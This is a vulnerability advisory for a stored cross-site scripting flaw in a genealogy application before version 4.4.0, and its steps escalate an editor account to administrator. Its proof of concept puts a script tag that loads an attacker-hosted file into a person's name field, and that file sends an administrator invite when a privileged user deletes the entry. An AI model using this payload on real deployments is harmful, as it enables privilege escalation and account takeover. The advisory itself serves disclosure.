Authenticated Stored Cross-Site Scripting (XSS) in Genealogy app prior to 4.4.0 allows arbitrary JavaScript execution and privilege escalation from Editor+ role to Administrator.
- Vulnerability type: Stored Cross-Site Scripting (CWE-79)
- Affected component: 'Person' firstname and lastname.
- Affected versions: All versions prior to 4.4.0
- Impact: Persistent execution of attacker-supplied JavaScript in victims’ browsers; session hijacking, CSRF via DOM, UI redress, credential theft, or arbitrary actions as the victim.
- Attack vector: Authenticated (any role with new person creation - editor+)
Root-cause: Inadequate server-side sanitisation/encoding of the persons firstname/lastname upon succesful delete of the affected person by a higher privileged user.
PoC:
- Authenticate to the application (editor+ role).
- Create a new person (does not necessiraly needs to be assigned to any family).
- Include the JavaScript as either the first name or last name of the added person:
<script src='yourserver/poc.js'></script> - Edit the poc.js with your email address in the placeholder.
- Once a privileged user attempts to delete the newly added person, you will receive an invite to the platform on the provided email address with the role of Administrator.